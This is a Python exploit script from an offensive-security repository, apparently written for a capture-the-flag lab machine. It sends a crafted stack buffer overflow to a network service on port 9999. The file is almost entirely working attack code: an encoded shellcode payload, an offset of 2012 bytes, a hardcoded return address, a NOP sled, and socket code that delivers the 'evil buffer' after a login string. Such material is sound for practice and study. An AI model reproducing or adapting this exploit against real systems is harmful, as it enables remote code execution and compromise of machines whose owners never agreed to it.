killchain-compendium/exploit/buffer_overflow/brainstorm.py

66 lines
2.3 KiB
Python
Raw Normal View History

2021-08-23 01:13:54 +02:00
import sys
import socket
badchars = bytearray()
listRem = [0x00]
for x in range(1, 256):
if x not in listRem:
badchars.append(x)
buf = b""
buf += b"\xdd\xc0\xd9\x74\x24\xf4\xbe\xd0\xdb\x95\xa8\x5d\x29"
buf += b"\xc9\xb1\x52\x31\x75\x17\x83\xc5\x04\x03\xa5\xc8\x77"
buf += b"\x5d\xb9\x07\xf5\x9e\x41\xd8\x9a\x17\xa4\xe9\x9a\x4c"
buf += b"\xad\x5a\x2b\x06\xe3\x56\xc0\x4a\x17\xec\xa4\x42\x18"
buf += b"\x45\x02\xb5\x17\x56\x3f\x85\x36\xd4\x42\xda\x98\xe5"
buf += b"\x8c\x2f\xd9\x22\xf0\xc2\x8b\xfb\x7e\x70\x3b\x8f\xcb"
buf += b"\x49\xb0\xc3\xda\xc9\x25\x93\xdd\xf8\xf8\xaf\x87\xda"
buf += b"\xfb\x7c\xbc\x52\xe3\x61\xf9\x2d\x98\x52\x75\xac\x48"
buf += b"\xab\x76\x03\xb5\x03\x85\x5d\xf2\xa4\x76\x28\x0a\xd7"
buf += b"\x0b\x2b\xc9\xa5\xd7\xbe\xc9\x0e\x93\x19\x35\xae\x70"
buf += b"\xff\xbe\xbc\x3d\x8b\x98\xa0\xc0\x58\x93\xdd\x49\x5f"
buf += b"\x73\x54\x09\x44\x57\x3c\xc9\xe5\xce\x98\xbc\x1a\x10"
buf += b"\x43\x60\xbf\x5b\x6e\x75\xb2\x06\xe7\xba\xff\xb8\xf7"
buf += b"\xd4\x88\xcb\xc5\x7b\x23\x43\x66\xf3\xed\x94\x89\x2e"
buf += b"\x49\x0a\x74\xd1\xaa\x03\xb3\x85\xfa\x3b\x12\xa6\x90"
buf += b"\xbb\x9b\x73\x36\xeb\x33\x2c\xf7\x5b\xf4\x9c\x9f\xb1"
buf += b"\xfb\xc3\x80\xba\xd1\x6b\x2a\x41\xb2\x99\xa2\x4e\x83"
buf += b"\xf6\xb6\x50\x12\x5b\x3e\xb6\x7e\x73\x16\x61\x17\xea"
buf += b"\x33\xf9\x86\xf3\xe9\x84\x89\x78\x1e\x79\x47\x89\x6b"
buf += b"\x69\x30\x79\x26\xd3\x97\x86\x9c\x7b\x7b\x14\x7b\x7b"
buf += b"\xf2\x05\xd4\x2c\x53\xfb\x2d\xb8\x49\xa2\x87\xde\x93"
buf += b"\x32\xef\x5a\x48\x87\xee\x63\x1d\xb3\xd4\x73\xdb\x3c"
buf += b"\x51\x27\xb3\x6a\x0f\x91\x75\xc5\xe1\x4b\x2c\xba\xab"
buf += b"\x1b\xa9\xf0\x6b\x5d\xb6\xdc\x1d\x81\x07\x89\x5b\xbe"
buf += b"\xa8\x5d\x6c\xc7\xd4\xfd\x93\x12\x5d\x1d\x76\xb6\xa8"
buf += b"\xb6\x2f\x53\x11\xdb\xcf\x8e\x56\xe2\x53\x3a\x27\x11"
buf += b"\x4b\x4f\x22\x5d\xcb\xbc\x5e\xce\xbe\xc2\xcd\xef\xea"
ip = "10.10.143.77"
port = 9999
offset = 2012
overflow = b"A" * offset
retn = b"\xdf\x14\x50\x62" #"BBBB"
padding = b"\x90" * 16
payload = buf
postfix = b""
buffer = overflow + retn + padding + payload + postfix
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip, port))
s.recv(2000)
s.send(b"pwnbot")
s.recv(2000)
print("Sending evil buffer...")
s.send(buffer)
print("Done!")
s.close()
except socket.error:
print("Could not connect: "+socket.error)